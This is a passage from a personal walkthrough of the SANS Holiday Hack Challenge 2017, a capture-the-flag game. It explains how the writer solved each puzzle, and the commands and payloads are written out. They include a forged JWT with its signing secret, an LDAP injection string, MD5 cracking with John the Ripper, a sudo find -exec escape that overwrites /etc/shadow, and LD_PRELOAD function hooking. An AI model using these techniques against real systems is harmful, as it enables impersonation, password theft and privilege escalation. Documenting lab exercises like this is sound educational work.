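      jwt.encode({"dept": "Engineering", "ou": "elf", "expires": "2017-12-31 12:00:47.248093+00:00", "uid": "alabaster.snowball"}, "3lv3s", algorithm="HS256")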
    Looks like it worked! Now... what to do with this? Luckily, Firefox has the ability to run Javascript "on the fly" to inject my own JWT into localStorage. I will do this by going to Developer--> Web Console --> JS tab and entering localStorage.setItem("np-auth","eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTEyLTMxIDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.KcrW5SPdQnMAPDnMWrryRigrM2ZSZsY3TLfrvoZ8Il4");

    When refreshing the page, I am now logged in as Alabaster Snowball!:
    It looks like there's a privileged area for a "Claus" by clicking on the dropdown in the top-right corner and selecting "Santa Panel"... but I get the following error: "You must be a Claus to access this panel!"

    This looks like a good place to store a letter to Santa. Now I need to figure out a way to log in as a "Claus". After reviewing this SANS Pentest blog post regarding LDAP (and this looks like it pulls information from an LDAP or LDAP-like source), I decide to give it a whirl to get the information I would need to forge another JWT -- this time for Santa Claus. Since the search is limited to either elves or reindeer, I would need to manipulate the POST request. I do this by manipulating the search field (since I can modify it "in-browser" and was shown to be the likely candidate according to the SANS blog post). The search term that gives me what I need is ))(dept=it)(|(cn= :
    When running that query, I get ALL of the personnel (not just the elves and reindeer) including Santa Claus!:
    I will now use pyjwt to "re-forge" the cookie -- now with santa.claus as the uid and administrators as the dept:
    Using Web Console's JS capability, I will, again, update "np-auth" with this new JWT and refresh the page. This time, I get a different error when clicking on the Claus Panel:
    Great... now I need to find a way to gather the password. After many (presumably) unsuccessful attempts to get the password to show up in the personnel search table by changing the attributes in the POST request with BURP Suite, I found out (with Wireshark) that the password hashes ARE being sent after all... just not rendered on the page:

    This hash identifies as a lot of potential hash types, but I'll try MD5 first as it's the most common of what's on the list:
    Next I must put the hash in a file and run John the Ripper against it:
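    Something like the following (the hash value itself comes from the Wireshark capture; the wordlist path is whatever you have handy):
      echo '<hash from Wireshark>' > santa.hash
      john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt santa.hash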
    Back at EDB, I enter Santa's password and got the letter to Santa!:

    This letter to Santa was from Emerald City Oz.

    9) Which character is ultimately the villain causing the giant snowball problem? What is the villain's motive?


    After "unseating the villian" in the last game, I discovered that the villian was Glinda, the Good Witch! Her motive was war profiteering.


    Terminal Challenges

    Linux Command Hijacking


    The objective of this challenge is to simply run a binary (elftalkd), so the first thing I did was to look for it with find:

    That's a strange error... and since when is "find" in /usr/local/bin? Something's not right, so I looked at PATH:

    Aha! /usr/local/sbin/ and /usr/local/bin/ are first in PATH, so I removed them and tried to find elftalkd again:
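    Roughly (a sketch; the point is just to drop the bogus directories from PATH and then search the real filesystem):
      export PATH=/usr/bin:/bin:/usr/sbin:/sbin
      find / -name elftalkd -type f 2>/dev/null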

    There it is! Now to run it:
    Success!

    Candy Cane Striper


    This one took a little extra research and I certainly gained a ton of knowledge! The goal of this one is to simply run a Linux binary... that is owned by root and marked as non-executable. 

    After many attempts to copy the binary, change permissions, and privilege escalation (to no avail), I stumbled upon the following web page: https://penturalabs.wordpress.com/2013/08/07/linux-execute-a-non-executable/

    The first task was to check the platform:

    Since it's x64, I need to see if I can execute CandyCaneStriper with ld-linux-x86-64.so.2 (after finding it first since it wasn't in /lib like the article states):
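    Something along these lines (the loader's path varies by distro, so use whatever find returns):
      find / -name 'ld-linux-x86-64.so.2' 2>/dev/null
      /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 ./CandyCaneStriper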

    Success!

    Christmas Songs Data Analysis


    This challenge brought back skills that I hadn't used in YEARS! The first thing I did was to see what type of input they're looking for in the answer, so I simply ran runtoanswer:

    So it appears to be the name of the song (and I do like the startup delay to prevent any brute-forcing). The next file to notice is the christmassongs.db file. Let's see if it's a sqlite database (as their databases typically end with .db extensions):
    Seems like it is, so the first thing I like to do is look for any tables and what their column names are:
    There could be multiple approaches to take here, but mine will be a 2-step process. The first step will be to get a count of each unique songid in the likes table:
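    Reconstructed from the breakdown below, that query was roughly:
      sqlite3 christmassongs.db "select songid, count(songid) from likes group by songid order by count(songid) desc limit 1;"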
    I'll break apart this complex SQLite query:

    • select songid, count(songid) from likes: Just show me the songid and how many from the likes table
    • group by songid: "Uniques" the results
    • order by count(songid) desc: Sort the results by the count of songids in descending order
    • limit 1: Only show the top result
    The second step is to find the title of the song with an id of 392:
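    Roughly (assuming the songs table uses id and title columns):
      sqlite3 christmassongs.db "select title from songs where id = 392;"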
    "Stairway to Heaven"? That can't be right! That's not even a Christmas song! Let's try it as our answer anyway:
    Success!

    Shadow File Restoration

    Right away, this one starts with a hint... that sudo is likely to be used. This saves a lot of time with trying other privilege escalation methods, so I checked to see what commands this user can run as root:

    Seems that the only option is to run find as root, but what's weird is that the output shows that the user "elf" must run this command as the group "shadow". This was a learning moment for me, as I've never used sudo with the -g option. But... back to find. How will find help me? Luckily, find is one of the well-known "shell-escapable" commands, thanks to its -exec option. Knowing this, I used find (now running with the shadow group) to locate a file that I created and then, using the -exec option, restored the /etc/shadow file:
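    The whole thing was roughly as follows (a sketch; the path to the backup copy of shadow is whatever you find on the box, and the -exec is what provides the escape):
      touch /tmp/marker
      sudo -g shadow find /tmp/marker -exec cp <backup copy of shadow> /etc/shadow \;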
    Did it work?

    Success!

    Isit42


    This one took a little bit of reverse engineering as well as reading one of the pentest blogs to fully grasp what we need to do here. The first thing I looked at was the snippet of code to see what function calls are being initiated by the program:

    After looking at this, it appears that a random number is returned instead of 42. Wouldn't it be nice if we could inject our own version of rand() to return 42? Turns out, with LD_PRELOAD, we can.

    The first step I took is to create a short program (myrandom.c) with the following code:
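    The whole file can be as small as this (a rough equivalent of what I wrote):
      int rand(void) {
          return 42;
      }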
    Looks simple enough, right? This program simply returns the number 42 whenever the rand function is called. The next step is to compile it with the -shared and -fPIC options, point the LD_PRELOAD variable at the resulting shared object, and run the executable:
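    Roughly (a sketch; isit42 here stands in for the challenge binary in the current directory):
      gcc -fPIC -shared -o myrandom.so myrandom.c
      export LD_PRELOAD=$PWD/myrandom.so
      ./isit42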

    This loaded my version of rand instead of the native one... giving us 42 every time rand() is called.
    Success!

    Troublesome Process Termination


    This one confused me for quite some time. Why, when "which kill" returns /bin/kill, does running kill <pid> (which doesn't kill the process) yield different results than /bin/kill <pid>? The answer: aliases! As shown below, all of the kill commands are simply aliased to 'true', which means THEY DO NOTHING!
    Next, I found the process ID for santaslittlehelperd, killed it using the full path to kill, and double-checked that it was killed:
    Success!

    Web Log

    This one was actually pretty simple, as I often find myself doing plenty of command-line kung-fu during my day job. As this is just an access log from a web server, it's in a standard format. The easiest way to peel out the User Agent (browser) is to separate each line on double-quotes and grab the 6th field (piped to "head" just to show the command and some of the output):
    Next was to sort and uniq the data to get a count of each browser (using "head" again to show the command and some of the output):
    After this I got the least common browser by piping the previous command to sort -n (for sort by number -- in ascending order) and piping that to head -n 1 to show only the top hit:
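    Put together, the pipeline was roughly the following (the log filename is a guess):
      awk -F'"' '{print $6}' access.log | sort | uniq -c | sort -n | head -n 1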
    And now for the test:
    Success!

    Train Startup


    Another VERY unique challenge! The first step is to look closely at the "file" command output:

    Hmm... that's strange. Why is this not x64? What would an ARM application be doing on this machine? After a quick Google search on how to execute an ARM application in Linux, I stumbled onto this page: http://tuxthink.blogspot.com/2012/04/executing-arm-executable-in-x86-using.html

    After verifying that qemu-arm is installed, I tried to run it along with our "broken" executable:



    Success!

    Extras

    Elves' Hints


    The Fifth Page

    This page was not part of the nine challenges above, but is required to get 100% of the objectives for the "Bumbles Bounce" game. Again, I'm not going to show my layout of tools, but here's the proof:

    100% Completion of Games

    Here's the proof that I completed 100% on the remaining five games:





    Unlocked Tools

    All the Points!


    Conclusion

    This article should give you all you need to complete the SANS Holiday Hack Challenge with the exception of the tool placement for the games. Good Luck!